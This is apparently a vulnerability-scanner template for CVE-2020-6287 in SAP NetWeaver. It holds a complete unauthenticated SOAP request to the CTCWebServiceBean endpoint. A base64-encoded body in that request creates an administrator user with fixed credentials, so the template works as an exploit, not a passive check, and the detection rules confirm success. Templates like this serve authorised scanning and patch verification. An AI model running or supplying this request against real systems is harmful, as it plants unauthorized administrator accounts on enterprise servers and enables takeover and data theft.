id: CVE-2020-6287
info:
  name: SAP NetWeaver Improper Authentication
  risk: Critical
  confidence: Tentative

params:
  - root: "{{.BaseURL}}"
  # this is base64 data
  - data: "x"
  # - data: "PHJvb3Q+PHVzZXI+PEphdmFPckFCQVA+amF2YTwvSmF2YU9yQUJBUD48dXNlcm5hbWU+c2FtcGxlMTwvdXNlcm5hbWU+PHBhc3N3b3JkPnBhc3N3b3JkMTwvcGFzc3dvcmQ+PHVzZXJUeXBlPkRpYWxvZzwvdXNlclR5cGU+PC91c2VyPjwvcm9vdD4="

variables:
  - prefix: |
      /
requests:
  # create admin POC
  # create user with credentials sample2:password1
  - method: POST
    redirect: false
    url: >-
      {{.root}}/{{.prefix}}CTCWebService/CTCWebServiceBean
    headers:
      - User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36
      - Content-Type: text/xml;charset=UTF-8
      - Accept-Language: en-US,en;q=0.9
      - Accept-Encoding: gzip, deflate
    body: |
      <soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:urn="urn:CTCWebServiceSi"><soapenv:Header/><soapenv:Body><urn:execute><identifier><component>sap.com/tc~lm~config~content</component><path>content/Netweaver/PI_PCK/PCK/PCKProcess.cproc</path></identifier><contextMessages><baData>PFBDSz48VXNlcm1hbmFnZW1lbnQ+PFNBUF9YSV9QQ0tfQ09ORklHPjxyb2xlTmFtZT5BZG1pbmlzdHJhdG9yPC9yb2xlTmFtZT48L1NBUF9YSV9QQ0tfQ09ORklHPjxTQVBfWElfUENLX0NPTU1VTklDQVRJT04+PHJvbGVOYW1lPllFRkRXQlNqWU1DPC9yb2xlTmFtZT48L1NBUF9YSV9QQ0tfQ09NTVVOSUNBVElPTj48U0FQX1hJX1BDS19NT05JVE9SPjxyb2xlTmFtZT41azRvN2dYVUJqcEo1WTwvcm9sZU5hbWU+PC9TQVBfWElfUENLX01PTklUT1I+PFNBUF9YSV9QQ0tfQURNSU4+PHJvbGVOYW1lPm14YjJUTEtJVmU8L3JvbGVOYW1lPjwvU0FQX1hJX1BDS19BRE1JTj48UENLVXNlcj48dXNlck5hbWUgc2VjdXJlPSJ0cnVlIj5zYW1wbGUyPC91c2VyTmFtZT48cGFzc3dvcmQgc2VjdXJlPSJ0cnVlIj5wYXNzd29yZDE8L3Bhc3N3b3JkPjwvUENLVXNlcj48UENLUmVjZWl2ZXI+PHVzZXJOYW1lPjVBUjFnMUxqbjk8L3VzZXJOYW1lPjxwYXNzd29yZCBzZWN1cmU9InRydWUiPmpXU1RFSEZ0MkQzY0RqUFE8L3Bhc3N3b3JkPjwvUENLUmVjZWl2ZXI+PFBDS01vbml0b3I+PHVzZXJOYW1lPkRPM1dPWHFpTFFUSjE8L3VzZXJOYW1lPjxwYXNzd29yZCBzZWN1cmU9InRydWUiPkJ3aEh0MFZoSEtObGk8L3Bhc3N3b3JkPjwvUENLTW9uaXRvcj48UENLQWRtaW4+PHVzZXJOYW1lPlZjWGxYbG9ZaHFXdnBWPC91c2VyTmFtZT48cGFzc3dvcmQgc2VjdXJlPSJ0cnVlIj5qYU1HYzFEQ1VzVU1adGVNPC9wYXNzd29yZD48L1BDS0FkbWluPjwvVXNlcm1hbmFnZW1lbnQ+PC9QQ0s+</baData><name>Netweaver.PI_PCK.PCK</name></contextMessages></urn:execute></soapenv:Body></soapenv:Envelope>
    detections:
      - >-
        StatusCode() == 500 && StringSearch("resHeaders", "text/xml") && StringSearch("response", "com.sap.tc.lm.ctc.metamodel.exception.XMLParsingException-Exception")
      - >-
        StatusCode() == 200 && StringSearch("resHeaders", "text/xml") && (StringSearch("response", "ns2:executeSynchroniousResponse") || StringSearch("response", "ns2:executeResponse"))
references:
  - https://www.cvebase.com/cve/2020/6287